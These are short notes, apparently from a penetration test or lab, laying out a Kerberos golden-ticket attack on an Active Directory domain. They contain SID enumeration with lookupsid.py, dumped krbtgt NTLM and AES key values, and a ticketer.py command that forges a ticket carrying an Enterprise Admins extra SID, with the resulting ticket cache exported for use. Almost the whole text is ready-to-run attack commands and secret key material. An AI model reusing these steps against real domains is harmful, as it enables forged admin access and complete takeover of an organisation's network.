Golden Ticket

lookupsid.py internal.zsm.local/"melissa"@192.168.210.16

lookupsid.py internal.zsm.local/"melissa"@192.168.210.10 | grep -B12 "Enterprise Admins"

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16

wmic useraccount where name="melissa" get sid

ticketer.py -aesKey 3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0 -domain internal.zsm.local -domain-sid S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -user-id 6603 melissa

export KRB5CCNAME=melissa.ccache